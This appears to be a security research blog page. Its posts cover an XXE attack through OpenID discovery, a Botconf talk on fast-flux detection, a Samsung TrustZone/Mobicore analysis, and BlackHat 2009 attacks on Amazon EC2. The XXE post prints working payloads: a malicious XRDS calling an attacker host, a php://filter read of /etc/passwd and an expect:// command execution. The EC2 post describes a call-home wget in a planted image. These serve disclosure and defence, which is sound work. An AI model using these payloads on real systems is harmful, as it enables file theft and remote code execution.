Grey bar Blue bar
Share this:

Tue, 28 Jan 2014

Revisting XXE and abusing protocols

Recently a security researcher reported a bug in Facebook that could potentially allow Remote Code Execution (RCE). His writeup of the incident is available here if you are interested. The thing that caught my attention about his writeup was not the fact that he had pwned Facebook or earned $33,500 doing it, but the fact that he used OpenID to accomplish this. After having a quick look at the output from the PoC and rereading the vulnerability description I had a pretty good idea of how the vulnerability was triggered and decided to see if any other platforms were vulnerable.

The basic premise behind the vulnerability is that when a user authenticates with a site using OpenID, that site does a 'discovery' of the user's identity. To accomplish this the server contacts the identity server specified by the user, downloads information regarding the identity endpoint and proceeds with authentication. There are two ways that a site may do this discovery process, either through HTML or a YADIS discovery. Now this is where it gets interesting, HTML look-up is simply a HTML document with some meta information contained in the head tags:

1
2
3
4
<head>
<link rel="openid.server" href="http://www.example.com/myendpoint/" />
<link rel="openid2.provider" href="http://www.example.com/myendpoint/" />
</head>
Whereas the Yadis discovery relies on a XRDS document:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
<xrds:XRDS
  xmlns:xrds="xri://$xrds"
  xmlns:openid="http://openid.net/xmlns/1.0"
  xmlns="xri://$xrd*($v*2.0)">
  <XRD>
    <Service priority="0">
      <Type>http://openid.net/signon/1.0</Type>
      <URI>http://198.x.x.143:7804:/raw</URI>
      <openid:Delegate>http://198.x.x.143:7804/delegate</openid:Delegate>
    </Service>
  </XRD>
</xrds:XRDS>
Now if you have been paying attention the potential for exploitation should be jumping out at you. XRDS is simply XML and as you may know, when XML is used there is a good chance that an application may be vulnerable to exploitation via XML External Entity (XXE) processing. XXE is explained by OWASP and I'm not going to delve into it here, but the basic premise behind it is that you can specify entities in the XML DTD that when processed by an XML parser get interpreted and 'executed'.

From the description given by Reginaldo the vulnerability would be triggered by having the victim (Facebook) perform the YADIS discovery to a host we control. Our host would serve a tainted XRDS and our XXE would be triggered when the document was parsed by our victim. I whipped together a little PoC XRDS document that would cause the target host to request a second file (198.x.x.143:7806/success.txt) from a server under my control. I ensured that the tainted XRDS was well formed XML and would not cause the parser to fail (a quick check can be done by using http://www.xmlvalidation.com/index.php)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?xml version="1.0" standalone="no"?>
<!DOCTYPE xrds:XRDS [
  <!ELEMENT xrds:XRDS (XRD)>
  <!ATTLIST xrds:XRDS xmlns:xrds CDATA "xri://$xrds">
  <!ATTLIST xrds:XRDS xmlns:openid CDATA "http://openid.net/xmlns/1.0">
  <!ATTLIST xrds:XRDS xmlns CDATA "xri://$xrd*($v*2.0)">
  <!ELEMENT XRD (Service)*>
  <!ELEMENT Service (Type,URI,openid:Delegate)>
  <!ATTLIST Service priority CDATA "0">
  <!ELEMENT Type (#PCDATA)>
  <!ELEMENT URI (#PCDATA)>
  <!ELEMENT openid:Delegate (#PCDATA)>
  <!ENTITY a SYSTEM 'http://198.x.x.143:7806/success.txt'>
]>

<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns:openid="http://openid.net/xmlns/1.0" xmlns="xri://$xrd*($v*2.0)"> <XRD> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>http://198.x.x.143:7806/raw.xml</URI> <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>&a;</URI> <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service> </XRD> </xrds:XRDS>

In our example the fist <Service> element would parse correctly as a valid OpenID discovery, while the second <Service> element contains our XXE in the form of <URI>&a;</URI>. To test this we set spun up a standard LAMP instance on DigitalOcean and followed the official installation instructions for a popular, OpenSource, Social platform that allowed for OpenID authentication. And then we tried out our PoC.

"Testing for successful XXE"

It worked! The initial YADIS discovery (orange) was done by our victim (107.x.x.117) and we served up our tainted XRDS document. This resulted in our victim requesting the success.txt file (red). So now we know we have some XXE going on. Next we needed to turn this into something a little more useful and emulate Reginaldo's Facebook success. A small modification was made to our XXE payload by changing the Entity description for our 'a' entity as follows: <!ENTITY a SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>. This will cause the PHP filter function to be applied to our input stream (the file read) before the text was rendered. This served two purposes, firstly to ensure the file we were reading to introduce any XML parsing errors and secondly to make the output a little more user friendly.

The first run with this modified payload didn't yield the expected results and simply resulted in the OpenID discovery being completed and my browser trying to download the identity file. A quick look at the URL, I realised that OpenID expected the identity server to automatically instruct the user's browser to return to the site which initiated the OpenID discovery. As I'd just created a simple python web server with no intelligence, this wasn't happening. Fortunately this behaviour could be emulated by hitting 'back' in the browser and then initiating the OpenID discovery again. Instead of attempting a new discovery, the victim host would use the cached identity response (with our tainted XRDS) and the result was returned in the URL.

"The simple python webserver didn't obey the redirect instruction in the URL and the browser would be stuck at the downloaded identity file."

"Hitting the back button and requesting OpenID login again would result in our XXE data being displayed in the URL."

Finally all we needed to do was base64 decode the result from the URL and we would have the contents of /etc/passwd.

"The decoded base64 string yielded the contents of /etc/passwd"

This left us with the ability to read *any* file on the filesystem, granted we knew the path and that the web server user had permissions to access that file. In the case of this particular platform, an interesting file to read would be config.php which yields the admin username+password as well as the mysql database credentials. The final trick was to try and turn this into RCE as was hinted in the Facebook disclosure. As the platform was written in PHP we could use the expect:// handler to execute code. <!ENTITY a SYSTEM 'expect://id'>, which should execute the system command 'id'. One dependency here is that the expect module is installed and loaded (http://de2.php.net/manual/en/expect.installation.php). Not too sure how often this is the case but other attempts at RCE haven't been too successful. Armed with our new XRDS document we reenact our steps from above and we end up with some code execution.

"RCE - retrieving the current user id"

And Boom goes the dynamite.

All in all a really fun vulnerability to play with and a good reminder that data validation errors don't just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates from. To protect against this form of attack in PHP the following should be set when using the default XML parser:

libxml_disable_entity_loader(true);

A good document with PHP security tips can be found here: http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html

./et

Wed, 8 Jan 2014

Botconf 2013


Botconf'13, the "First botnet fighting conference" took place in Nantes, France from 5-6 December 2013. Botconf aimed to bring together the anti-botnet community, including law enforcement, ISPs and researchers. To this end the conference was a huge success, especially since a lot of networking occurred over the lunch and tea breaks as well as the numerous social events organised by Botconf.


I was fortunate enough to attend as a speaker and to present a small part of my Masters research. The talk focused the use of Spatial Statistics to detect Fast-Flux botnet Command and Control (C2) domains based on the geographic location of the C2 servers. This research aimed to find novel techniques that would allow for accurate and lightweight classifiers to detect Fast-Flux domains. Using DNS query responses it was possible to identify Fast-Flux domains based on values such as the TTL, number of A records and different ASNs. In an attempt to increase the accuracy of this classifier, additional analysis was performed and it was observed that Fast-Flux domains tended to have numerous C2 servers widely dispersed geographically. Through the use of the statistical methods employed in plant and animal dispersion statistics, namely Moran's I and Geary's C, new classifiers were created. It was shown that these classifiers could detect Fast-Flux domains with up to a 97% accuracy, maintaining a False Positive rate of only 3.25% and a True Positive rate of 99%. Furthermore, it was shown that the use of these classifiers would not significantly impact current network performance and would not require changes to current network architecture.


The paper for the talk is available here: Paper.pdf
The presentation is available here: Presentation.pdf
I'll update this post with a link to the presentation video once it is available.


The scripts used to conduct the research are available on github and are in the process of being updated (being made human readable): https://github.com/staaldraad/fastfluxanalysis


The following blogs provide a comprehensive round-up of the conference including summaries of the talks:


http://bl0g.cedricpernet.net/post/2013/12/12/Botconf-2013-A-real-success
http://blog.rootshell.be/2013/12/06/botconf-2013-wrap-up-day-1/
http://www.virusbtn.com/blog/2013/12_10.xml
http://www.lexsi-leblog.fr/cert/botconf-la-sweet-orange-conference.html


Thu, 6 Jun 2013

A software level analysis of TrustZone OS and Trustlets in Samsung Galaxy Phone

Introduction:


New types of mobile applications based on Trusted Execution Environments (TEE) and most notably ARM TrustZone micro-kernels are emerging which require new types of security assessment tools and techniques. In this blog post we review an example TrustZone application on a Galaxy S3 phone and demonstrate how to capture communication between the Android application and TrustZone OS using an instrumented version of the Mobicore Android library. We also present a security issue in the Mobicore kernel driver that could allow unauthorised communication between low privileged Android processes and Mobicore enabled kernel drivers such as an IPSEC driver.


Mobicore OS :


The Samsung Galaxy S III was the first mobile phone that utilized ARM TrustZone feature to host and run a secure micro-kernel on the application processor. This kernel named Mobicore is isolated from the handset's Android operating system in the CPU design level. Mobicore is a micro-kernel developed by Giesecke & Devrient GmbH (G&D) which uses TrustZone security extension of ARM processors to create a secure program execution and data storage environment which sits next to the rich operating system (Android, Windows , iOS) of the Mobile phone or tablet. The following figure published by G&D demonstrates Mobicore's architecture :

Overview of Mobicore (courtesy of G&D)


A TrustZone enabled processor provides "Hardware level Isolation" of the above "Normal World" (NWd) and "Secure World" (SWd) , meaning that the "Secure World" OS (Mobicore) and programs running on top of it are immune against software attacks from the "Normal World" as well as wide range of hardware attacks on the chip. This forms a "trusted execution environment" (TEE) for security critical application such as digital wallets, electronic IDs, Digital Rights Management and etc. The non-critical part of those applications such as the user interface can run in the "Normal World" operating system while the critical code, private encryption keys and sensitive I/O operations such as "PIN code entry by user" are handled by the "Secure World". By doing so, the application and its sensitive data would be protected against unauthorized access even if the "Normal World" operating system was fully compromised by the attacker, as he wouldn't be able to gain access to the critical part of the application which is running in the secure world.

Mobicore API:


The security critical applications that run inside Mobicore OS are referred to as trustlets and are developed by third-parties such as banks and content providers. The trustlet software development kit includes library files to develop, test and deploy trustlets as well as Android applications that communicate with relevant trustlets via Mobicore API for Android. Trustlets need to be encrypted, digitally signed and then remotely provisioned by G&D on the target mobile phone(s). Mobicore API for Android consists of the following 3 components:


1) Mobicore client library located at /system/lib/libMcClient.so: This is the library file used by Android OS or Dalvik applications to establish communication sessions with trustlets on the secure world


2) Mobicore Daemon located at /system/bin/mcDriverDaemon: This service proxies Mobicore commands and responses between NWd and SWd via Mobicore device driver


3) Mobicore device driver: Registers /dev/mobicore device and performs ARM Secure Monitor Calls (SMC) to switch the context from NWd to SWd


The source code for the above components can be downloaded from Google Code. I enabled the verbose debug messages in the kernel driver and recompiled a Samsung S3 kernel image for the purpose of this analysis. Please note that you need to download the relevant kernel source tree and stock ROM for your S3 phone kernel build number which can be found in "Settings->About device". After compiling the new zImage file, you would need to insert it into a custom ROM and flash your phone. To build the custom ROM I used "Android ROM Kitchen 0.217" which has the option to unpack zImage from the stock ROM, replace it with the newly compiled zImage and pack it again.


By studying the source code of the user API library and observing debug messages from the kernel driver, I figured out the following data flow between the android OS and Mobicore to establish a session and communicate with a trustlet:


1) Android application calls mcOpenDevice() API which cause the Mobicore Daemon (/system/bin/mcDriverDaemon) to open a handle to /dev/mobicore misc device.


2) It then allocates a "Worlds share memory" (WSM) buffer by calling mcMallocWsm() that cause the Mobicore kernel driver to allocate wsm buffer with the requested size and map it to the user space application process. This shared memory buffer would later be used by the android application and trustlet to exchange commands and responses.


3) The mcOpenSession() is called with the UUID of the target trustlet (10 bytes value, for instance : ffffffff000000000003 for PlayReady DRM truslet) and allocate wsm address to establish a session with the target trustlet through the allocated shared memory.


4) Android applications have the option to attach additional memory buffers (up to 6 with maximum size of 1MB each) to the established session by calling mcMap() API. In case of PlayReady DRM trustlet which is used by the Samsung VideoHub application, two additional buffers are attached: one for sending and receiving the parameters and the other for receiving trustlet's text output.


5) The application copies the command and parameter types to the WSM along with the parameter values in second allocated buffer and then calls mcNotify() API to notify the Mobicore that a pending command is waiting in the WSM to be dispatched to the target trustlet.


6) The mcWaitNotification() API is called with the timeout value which blocks until a response received from the trustlet. If the response was not an error, the application can read trustlets' returned data, output text and parameter values from WSM and the two additional mapped buffers.


7) At the end of the session the application calls mcUnMap, mcFreeWsm and mcCloseSession .


The Mobicore kernel driver is the only component in the android operating system that interacts directly with Mobicore OS by use of ARM CPU's SMC instruction and Secure Interrupts . The interrupt number registered by Mobicore kernel driver in Samsung S3 phone is 47 that could be different for other phone or tablet boards. The Mobicore OS uses the same interrupt to notify the kernel driver in android OS when it writes back data.


Analysis of a Mobicore session:


There are currently 5 trustlets pre-loaded on the European S3 phones as listed below:


shell@android:/ # ls /data/app/mcRegistry


00060308060501020000000000000000.tlbin
02010000080300030000000000000000.tlbin
07010000000000000000000000000000.tlbin
ffffffff000000000000000000000003.tlbin
ffffffff000000000000000000000004.tlbin
ffffffff000000000000000000000005.tlbin


The 07010000000000000000000000000000.tlbin is the "Content Management" trustlet which is used by G&D to install/update other trustlets on the target phones. The 00060308060501020000000000000000.tlbin and ffffffff000000000000000000000003.tlbin are DRM related truslets developed by Discretix. I chose to analyze PlayReady DRM trustlet (ffffffff000000000000000000000003.tlbin), as it was used by the Samsung videohub application which is pre-loaded on the European S3 phones.


The videohub application dose not directly communicate with PlayReady trustlet. Instead, the Android DRM manager loads several DRM plugins including libdxdrmframeworkplugin.so which is dependent on libDxDrmServer.so library that makes Mobicore API calls. Both of these libraries are closed source and I had to perform dynamic analysis to monitor communication between libDxDrmServer.so and PlayReady trustlet. For this purpose, I could install API hooks in android DRM manager process (drmserver) and record the parameter values passed to Mobicore user library (/system/lib/libMcClient.so) by setting LD_PRELOAD environment variable in the init.rc script and flash my phone with the new ROM. I found this approach unnecessary, as the source code for Mobicore user library was available and I could add simple instrumentation code to it which saves API calls and related world shared memory buffers to a log file. In order to compile such modified Mobicore library, you would need to the place it under the Android source code tree on a 64 bit machine (Android 4.1.1 requires 64 bit machine to compile) with 30 GB disk space. To save you from this trouble, you can download a copy of my Mobicore user library from here. You need to create the empty log file at /data/local/tmp/log and replace this instrumented library with the original file (DO NOT FORGET TO BACKUP THE ORIGINAL FILE). If you reboot the phone, the Mobicore session between Android's DRM server and PlayReady trustlet will be logged into /data/local/tmp/log. A sample of such session log is shown below:



The content and address of the shared world memory and two additional mapped buffers are recorded in the above file. The command/response format in wsm buffer is very similar to APDU communication in smart card applications and this is not a surprise, as G&D has a long history in smart card technology. The next step is to interpret the command/response data, so that we can manipulate them later and observe the trustlet behavior. The trustlet's output in text format together with inspecting the assembly code of libDxDrmServer.so helped me to figure out the PlayReady trustlet command and response format as follows:


client command (wsm) : 08022000b420030000000001000000002500000028023000300000000500000000000000000000000000b0720000000000000000


client parameters (mapped buffer 1): 8f248d7e3f97ee551b9d3b0504ae535e45e99593efecd6175e15f7bdfd3f5012e603d6459066cc5c602cf3c9bf0f705b


trustlet response (wsm):08022000b420030000000081000000002500000028023000300000000500000000000000000000000000b0720000000000000000


trustltlet text output (mapped buffer 2):


==================================================


SRVXInvokeCommand command 1000000 hSession=320b4


SRVXInvokeCommand. command = 0x1000000 nParamTypes=0x25


SERVICE_DRM_BBX_SetKeyToOemContext - pPrdyServiceGlobalContext is 32074


SERVICE_DRM_BBX_SetKeyToOemContext cbKey=48


SERVICE_DRM_BBX_SetKeyToOemContext type=5


SERVICE_DRM_BBX_SetKeyToOemContext iExpectedSize match real size=48


SERVICE_DRM_BBX_SetKeyToOemContext preparing local buffer DxDecryptAsset start - iDatatLen=32, pszInData=0x4ddf4 pszIntegrity=0x4dde4


DxDecryptAsset calling Oem_Aes_SetKey DxDecryptAsset


calling DRM_Aes_CtrProcessData DxDecryptAsset


calling DRM_HMAC_CreateMAC iDatatLen=32 DxDecryptAsset


after calling DRM_HMAC_CreateMAC DxDecryptAsset


END SERVICE_DRM_BBX_SetKeyToOemContext


calling DRM_BBX_SetKeyToOemContext


SRVXInvokeCommand.id=0x1000000 res=0x0


==============================================


By mapping the information disclosed in the trustlet text output to the client command the following format was derived:


08022000 : virtual memory address of the text output buffer in the secure world (little endian format of 0x200208)


b4200300 : PlayReady session ID


00000001: Command ID (0x1000000)


00000000: Error code (0x0 = no error, is set by truslet after mcWaitNotification)


25000000: Parameter type (0x25)


28023000: virtual memory address of the parameters buffer in the secure world (little endian format of 0x300228)


30000000: Parameters length in bytes (0x30, encrypted key length)


05000000: encryption key type (0x5)


The trustlet receives client supplied memory addresses as input data which could be manipulated by an attacker. We'll test this attack later. The captured PlayReady session involved 18 command/response pairs that correspond to the following high level diagram of PlayReady DRM algorithm published by G&D. I couldn't find more detailed specification of the PlayReady DRM on the MSDN or other web sites. But at this stage, I was not interested in the implementation details of the PlayReady schema, as I didn't want to attack the DRM itself, but wanted to find any exploitable issue such as a buffer overflow or memory disclosure in the trustlet.

DRM Trustlet diagram (courtesy of G&D)


Security Tests:


I started by auditing the Mobicore daemon and kernel driver source code in order to find issues that can be exploited by an android application to attack other applications or result in code execution in the Android kernel space. I find one issue in the Mobicore kernel API which is designed to provide Mobicore services to other Android kernel components such as an IPSEC driver. The Mobicore driver registers Linux netLink server with id=17 which was intended to be called from the kernel space, however a Linux user space process can create a spoofed message using NETLINK sockets and send it to the Mobicore kernel driver netlink listener which as shown in the following figure did not check the PID of the calling process and as a result, any Android app could call Mobicore APIs with spoofed session IDs. The vulnerable code snippet from MobiCoreKernelApi/main.c is included below.



An attacker would need to know the "sequence number" of an already established netlink connection between a kernel component such as IPSEC and Mobicore driver in order to exploit this vulnerability. This sequence numbers were incremental starting from zero but currently there is no kernel component on the Samsung phone that uses the Mobicore API, thus this issue was not a high risk. We notified the vendor about this issue 6 months ago but haven't received any response regarding the planned fix. The following figures demonstrate exploitation of this issue from an Android unprivileged process :

Netlink message (seq=1) sent to Mobicore kernel driver from a low privileged process


Unauthorised netlink message being processed by the Mobicore kernel driver


In the next phase of my tests, I focused on fuzzing the PlayReady DRM trustlet that mentioned in the previous section by writing simple C programs which were linked with libMcClient.so and manipulating the DWORD values such as shared buffer virtual address. The following table summarises the results:
wsm offsetDescriptionResults
0Memory address of the mapped output buffer in trustlet process (original value=0x08022000)for values<0x8022000 the fuzzer crashed


values >0x8022000 no errors

41memory address of the parameter mapped buffer in trusltet process (original value=0x28023000)0x00001000<value<0x28023000 the fuzzer crashed


value>=00001000 trustlet exits with "parameter refers to secure memory area"


value>0x28023000 no errors

49Parameter length (encryption key or certificate file length)For large numbers the trustlet exits with "malloc() failed" message

The fuzzer crash indicated that Mobicore micro-kernel writes memory addresses in the normal world beyond the shared memory buffer which was not a critical security issue, because it means that fuzzer can only attack itself and not other processes. The "parameter refers to secure memory area" message suggests that there is some sort of input validation implemented in the Mobicore OS or DRM trustlet that prevents normal world's access to mapped addresses other than shared buffers. I haven't yet run fuzzing on the parameter values itself such as manipulating PlayReady XML data elements sent from the client to the trustlet. However, there might be vulnerabilities in the PlayReady implementation that can be picked up by smarter fuzzing.


Conclusion:


We demonstrated that intercepting and manipulating the worlds share memory (WSM) data can be used to gain better knowledge about the internal workings of Mobicore trustlets. We believe that this method can be combined with the side channel measurements to perform blackbox security assessment of the mobile TEE applications. The context switching and memory sharing between normal and secure world could be subjected to side channel attacks in specific cases and we are focusing our future research on this area.

Sat, 8 Aug 2009

BlackHat presentation demo vids: Amazon

[part 4 in a series of 5 video write-ups from our BlackHat 09 talk, summary here]

Goal

In the fourth installment of our BlackHat video series, we turned our attention to Amazon's cloud platform and focused on their Elastic Compute Cloud (EC2) service specifically.

Theft of resources is the red-headed step-child of attack classes and doesn't get much attention, but on cloud platforms where resources are shared amongst many users these attacks can have a very real impact. With this in mind, we wanted to show how EC2 was vulnerable to a number of resource theft attacks and the videos below demonstrate three separate attacks against EC2 that permit an attacker to boot up massive numbers of machines, steal computing time/bandwidth from other users and steal paid-for AMIs.

Background

EC2 enables users to boot and run virtual machines that are custom-configured by the user but execute within Amazon's cloud. Each virtual machine or Amazon Machine Instance (AMI) has its own IP, non-persistent storage, CPU and network connection. The service is full-featured and we won't go into all details here, more info is available from the EC2 site. With that said we'll point out three key facts that shaped our testing:
  1. The service is controlled via a web interface so sign-up obviously occurs in a browser. Sign-up requires minimul information, essentially just an email and credit card info.
  2. When booting an AMI, users can either create their own image from scratch or they can choose from a list of pre-built AMIs which are overwhelmingly supplied by other EC2 users.
  3. Amazon provide a facility called DevPay by which users can create AMIs for leasing to other users; when a non-free AMI is run then the user running the instance is charged a fixed rate and the proceeds are split between the creator of the instance and Amazon.

Video 1: AMIBomb

For this video we wanted to consider a DoS on the EC2 from within, by running as many AMIs concurrently as possible.

Since sign-up for the sevice occurred in a browser, it was possible to script this process (using Twill for the most part). The first attack would be to boot hundreds or thousands of instances under one Amazon account, however an upper bound of 20 running machines per account is enforced by Amazon. Our approach was one step removed from this; we created multiple accounts and then ran the 20 machines. Each new account would also create multiple accounts and then run 20 machines. One iteration of the create-accounts-and-boot-AMIs cycle took three minutes; by the ninth iteration the projected number of running instances is ridiculous. It's apparent that this recursive registering of accounts and booting machines means that the number of running machines grows exponentially and this could continue until the system can't handle the machine load.

Our approach was effective because the registration process took no steps to prevent automated sign-up. In testing a single credit card was used to create our accounts which is an immediate anomaly however a malicious attacker would use stolen CC data to ensure that CC checks did not prevent new account registration.

Video 2: AMI Registration Race

As has been mentioned, users can choose AMIs from a list of machines that is mostly user-generated (out of 2700 odd machines, 47 were built by Amazon and the remainder by other users.) It is easy to add a machine to this list; simply create a new AMI and in its properties mark it as 'public'.

Our idea was to create a malicious AMI and add it to the public listing, with the goal being to show that users will run AMIs without any consideration for who built it or whether nasties were included. We quickly created an AMI, uploaded it and... nothing. No one ran the image and it seemed that people weren't so easily fooled.

Digging a little deeper, however, revealed that when our image was created, it was dumped on the second last page of the AMI listings and so users would have to surf through more than 50 pages of images before coming across our AMI. If Google has taught us anything, it's that ranking counts and so we needed to boost our machine up the AMI listing.

It turns out that the AMI listing is ordered by the AMI ID, which is a random id string that is generated when the AMI is created. Our process was then slightly modified as follows: we scripted the AMI registration process so that it was trivial to register an image. We then looped the registration script to create and register an AMI, and tested to see whether the randomly assigned AMI ID was low enough such that our AMI was listed on the first page.

Our first attempt took about 4000 iterations and landed us a top 5 spot in under 12 hours. A subsequent attempt took less than 4 hours to land a top 5 spot.

This was great, but our image was unattractively named 'qscanImage' runing on the 'Other Linux' platform, which didn't say much about it.

It turned out that we had a great degree of freedom in naming images. Images were stored in Amazon S3 buckets and the buckets had globally unique names. We tried buckets with names such as 'fedora', 'fedora_core' and 'redhat', but all these were taken, however with a small degree of evilness the bucket 'fedora_core_11' was available and so registered. The registration race was repeated with the better named machine, and after a little while we landed the AMI on the front page as shown in the screnshot below:

What's funny is that the machine was the highest listed 'Fedora' AMI, so a user who was specifically looking for a Fedora image would come across our evil image first.

In reality our image did not have anything malicious except a call-home line in '/etc/rc.local' that would 'wget' a file on our webserver, to show the image had been booted. The screenshot below shows the logline from our webserver which proved the image had been booted; this occurred in a little under four hours after the instance had been made public.

Video 3: AMI Stealing

Our final Amazon video shows how it is possible to remove ancestry information from AMIs. When a paid-for machine is created, Amazon stores information about the owner of the machine in its manifest (which is an XML document) in order to pay the creator of the image. Our attack works as follows:

  1. Purchase a paid-for image
  2. Use Amazon's tools to create a bundle from the running AMI
  3. Download the manifest for the bundle
  4. Modify the manifest by removing the associated product code and owner information
  5. Resign the manifest using Amazon's tools
  6. Upload the manifest
  7. Register a new AMI using the bundle that was copied from the paid-for AMI, along with the edited manifest
  8. Stop using the original paid-for AMI
Using this attack, it is possible to pay once for an AMI, create a copy and never pay the creator again.

Conclusion

In this set of three videos, we showed attacks against the Amazon EC2 platform that do not target specific weaknesses in technologies; rather the processes by which complex actions took place were abused to our benefit. In doing so, we managed to sketch a scenario by which a local DoS might be effected against EC2, successfully showed how easy it was to have users run untrusted AMIs and lastly described a method by which non-free AMIs may be stripped of owner information, thereby foregoing income to the AMI creator and allowing the attacker to continue using the paid-for AMI without cost.